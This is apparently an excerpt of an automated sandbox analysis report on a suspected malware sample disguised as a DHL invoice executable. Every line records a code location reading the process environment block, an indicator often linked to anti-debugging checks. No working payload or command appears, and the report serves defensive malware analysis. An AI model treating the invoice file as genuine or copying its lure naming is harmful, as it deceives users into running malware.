Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797C85 mov eax, dword ptr fs:[00000030h]	3_2_1D797C85
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D797C85 mov eax, dword ptr fs:[00000030h]	3_2_1D797C85
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79EF79 mov eax, dword ptr fs:[00000030h]	3_2_1D79EF79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79EF79 mov eax, dword ptr fs:[00000030h]	3_2_1D79EF79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79EF79 mov eax, dword ptr fs:[00000030h]	3_2_1D79EF79
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79BF70 mov eax, dword ptr fs:[00000030h]	3_2_1D79BF70
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F8B mov eax, dword ptr fs:[00000030h]	3_2_1D828F8B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F8B mov eax, dword ptr fs:[00000030h]	3_2_1D828F8B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F8B mov eax, dword ptr fs:[00000030h]	3_2_1D828F8B
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A1F70 mov eax, dword ptr fs:[00000030h]	3_2_1D7A1F70
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CAF72 mov eax, dword ptr fs:[00000030h]	3_2_1D7CAF72
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7F6F70 mov eax, dword ptr fs:[00000030h]	3_2_1D7F6F70
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79FF30 mov edi, dword ptr fs:[00000030h]	3_2_1D79FF30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D821FC9 mov eax, dword ptr fs:[00000030h]	3_2_1D821FC9
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDF36 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDF36
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDF36 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDF36
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDF36 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDF36
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BDF36 mov eax, dword ptr fs:[00000030h]	3_2_1D7BDF36
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85EFD3 mov eax, dword ptr fs:[00000030h]	3_2_1D85EFD3
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FFDC mov eax, dword ptr fs:[00000030h]	3_2_1D81FFDC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FFDC mov eax, dword ptr fs:[00000030h]	3_2_1D81FFDC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FFDC mov eax, dword ptr fs:[00000030h]	3_2_1D81FFDC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FFDC mov ecx, dword ptr fs:[00000030h]	3_2_1D81FFDC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FFDC mov eax, dword ptr fs:[00000030h]	3_2_1D81FFDC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FFDC mov eax, dword ptr fs:[00000030h]	3_2_1D81FFDC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E0F16 mov eax, dword ptr fs:[00000030h]	3_2_1D7E0F16
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E0F16 mov eax, dword ptr fs:[00000030h]	3_2_1D7E0F16
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E0F16 mov eax, dword ptr fs:[00000030h]	3_2_1D7E0F16
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E0F16 mov eax, dword ptr fs:[00000030h]	3_2_1D7E0F16
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBF0C mov eax, dword ptr fs:[00000030h]	3_2_1D7DBF0C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBF0C mov eax, dword ptr fs:[00000030h]	3_2_1D7DBF0C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBF0C mov eax, dword ptr fs:[00000030h]	3_2_1D7DBF0C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874FFF mov eax, dword ptr fs:[00000030h]	3_2_1D874FFF
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BCF00 mov eax, dword ptr fs:[00000030h]	3_2_1D7BCF00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7BCF00 mov eax, dword ptr fs:[00000030h]	3_2_1D7BCF00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FF03 mov eax, dword ptr fs:[00000030h]	3_2_1D81FF03
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FF03 mov eax, dword ptr fs:[00000030h]	3_2_1D81FF03
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FF03 mov eax, dword ptr fs:[00000030h]	3_2_1D81FF03
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7C8FFB mov eax, dword ptr fs:[00000030h]	3_2_1D7C8FFB
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874F1D mov eax, dword ptr fs:[00000030h]	3_2_1D874F1D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B6FE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7B6FE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D799FD0 mov eax, dword ptr fs:[00000030h]	3_2_1D799FD0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79BFC0 mov eax, dword ptr fs:[00000030h]	3_2_1D79BFC0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F3C mov eax, dword ptr fs:[00000030h]	3_2_1D828F3C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F3C mov eax, dword ptr fs:[00000030h]	3_2_1D828F3C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F3C mov ecx, dword ptr fs:[00000030h]	3_2_1D828F3C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D828F3C mov ecx, dword ptr fs:[00000030h]	3_2_1D828F3C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D8FBC mov eax, dword ptr fs:[00000030h]	3_2_1D7D8FBC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85BF4D mov eax, dword ptr fs:[00000030h]	3_2_1D85BF4D
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A4FB6 mov eax, dword ptr fs:[00000030h]	3_2_1D7A4FB6
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CCFB0 mov eax, dword ptr fs:[00000030h]	3_2_1D7CCFB0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CCFB0 mov eax, dword ptr fs:[00000030h]	3_2_1D7CCFB0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A1FAA mov eax, dword ptr fs:[00000030h]	3_2_1D7A1FAA
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85AF50 mov ecx, dword ptr fs:[00000030h]	3_2_1D85AF50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85EF66 mov eax, dword ptr fs:[00000030h]	3_2_1D85EF66
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B0F90 mov eax, dword ptr fs:[00000030h]	3_2_1D7B0F90
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CBF93 mov eax, dword ptr fs:[00000030h]	3_2_1D7CBF93
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874F7C mov eax, dword ptr fs:[00000030h]	3_2_1D874F7C
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A1E70 mov eax, dword ptr fs:[00000030h]	3_2_1D7A1E70
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D7E71 mov eax, dword ptr fs:[00000030h]	3_2_1D7D7E71
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DCE70 mov eax, dword ptr fs:[00000030h]	3_2_1D7DCE70
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79BE60 mov eax, dword ptr fs:[00000030h]	3_2_1D79BE60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79BE60 mov eax, dword ptr fs:[00000030h]	3_2_1D79BE60
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D860EAD mov eax, dword ptr fs:[00000030h]	3_2_1D860EAD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D860EAD mov eax, dword ptr fs:[00000030h]	3_2_1D860EAD
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7CEE48 mov eax, dword ptr fs:[00000030h]	3_2_1D7CEE48
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79FE40 mov eax, dword ptr fs:[00000030h]	3_2_1D79FE40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79AE40 mov eax, dword ptr fs:[00000030h]	3_2_1D79AE40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79AE40 mov eax, dword ptr fs:[00000030h]	3_2_1D79AE40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79AE40 mov eax, dword ptr fs:[00000030h]	3_2_1D79AE40
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79DE45 mov eax, dword ptr fs:[00000030h]	3_2_1D79DE45
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79DE45 mov ecx, dword ptr fs:[00000030h]	3_2_1D79DE45
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D827EC3 mov eax, dword ptr fs:[00000030h]	3_2_1D827EC3
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D827EC3 mov ecx, dword ptr fs:[00000030h]	3_2_1D827EC3
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DCE3F mov eax, dword ptr fs:[00000030h]	3_2_1D7DCE3F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874EC1 mov eax, dword ptr fs:[00000030h]	3_2_1D874EC1
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A2E32 mov eax, dword ptr fs:[00000030h]	3_2_1D7A2E32
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D82CED0 mov ecx, dword ptr fs:[00000030h]	3_2_1D82CED0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D869ED2 mov eax, dword ptr fs:[00000030h]	3_2_1D869ED2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79BE18 mov ecx, dword ptr fs:[00000030h]	3_2_1D79BE18
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D85EEE7 mov eax, dword ptr fs:[00000030h]	3_2_1D85EEE7
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D8E15 mov eax, dword ptr fs:[00000030h]	3_2_1D7D8E15
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3E14 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3E14
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3E14 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3E14
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3E14 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3E14
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D843EFC mov eax, dword ptr fs:[00000030h]	3_2_1D843EFC
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6E00 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6E00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6E00 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6E00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6E00 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6E00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A6E00 mov eax, dword ptr fs:[00000030h]	3_2_1D7A6E00
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3E01 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3E01
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D874E03 mov eax, dword ptr fs:[00000030h]	3_2_1D874E03
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CEF0 mov eax, dword ptr fs:[00000030h]	3_2_1D79CEF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CEF0 mov eax, dword ptr fs:[00000030h]	3_2_1D79CEF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CEF0 mov eax, dword ptr fs:[00000030h]	3_2_1D79CEF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CEF0 mov eax, dword ptr fs:[00000030h]	3_2_1D79CEF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CEF0 mov eax, dword ptr fs:[00000030h]	3_2_1D79CEF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D79CEF0 mov eax, dword ptr fs:[00000030h]	3_2_1D79CEF0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D1EED mov eax, dword ptr fs:[00000030h]	3_2_1D7D1EED
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D1EED mov eax, dword ptr fs:[00000030h]	3_2_1D7D1EED
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D1EED mov eax, dword ptr fs:[00000030h]	3_2_1D7D1EED
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A2EE8 mov eax, dword ptr fs:[00000030h]	3_2_1D7A2EE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A2EE8 mov eax, dword ptr fs:[00000030h]	3_2_1D7A2EE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A2EE8 mov eax, dword ptr fs:[00000030h]	3_2_1D7A2EE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A2EE8 mov eax, dword ptr fs:[00000030h]	3_2_1D7A2EE8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7A3EE0 mov eax, dword ptr fs:[00000030h]	3_2_1D7A3EE0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FE1F mov eax, dword ptr fs:[00000030h]	3_2_1D81FE1F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FE1F mov eax, dword ptr fs:[00000030h]	3_2_1D81FE1F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FE1F mov eax, dword ptr fs:[00000030h]	3_2_1D81FE1F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81FE1F mov eax, dword ptr fs:[00000030h]	3_2_1D81FE1F
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D868E26 mov eax, dword ptr fs:[00000030h]	3_2_1D868E26
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D868E26 mov eax, dword ptr fs:[00000030h]	3_2_1D868E26
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D868E26 mov eax, dword ptr fs:[00000030h]	3_2_1D868E26
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D868E26 mov eax, dword ptr fs:[00000030h]	3_2_1D868E26
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7E1ED8 mov eax, dword ptr fs:[00000030h]	3_2_1D7E1ED8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7DBED0 mov eax, dword ptr fs:[00000030h]	3_2_1D7DBED0
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D836E30 mov eax, dword ptr fs:[00000030h]	3_2_1D836E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D836E30 mov eax, dword ptr fs:[00000030h]	3_2_1D836E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835E30 mov eax, dword ptr fs:[00000030h]	3_2_1D835E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835E30 mov ecx, dword ptr fs:[00000030h]	3_2_1D835E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835E30 mov eax, dword ptr fs:[00000030h]	3_2_1D835E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835E30 mov eax, dword ptr fs:[00000030h]	3_2_1D835E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835E30 mov eax, dword ptr fs:[00000030h]	3_2_1D835E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D835E30 mov eax, dword ptr fs:[00000030h]	3_2_1D835E30
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2EB8 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2EB8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7D2EB8 mov eax, dword ptr fs:[00000030h]	3_2_1D7D2EB8
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov ecx, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D7B1EB2 mov eax, dword ptr fs:[00000030h]	3_2_1D7B1EB2
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81DE50 mov eax, dword ptr fs:[00000030h]	3_2_1D81DE50
Source: C:\Users\user\Desktop\DHL-INVOICE-MBV.exe	Code function: 3_2_1D81DE50 mov eax, dword ptr fs:[00000030h]	3_2_1D81DE50
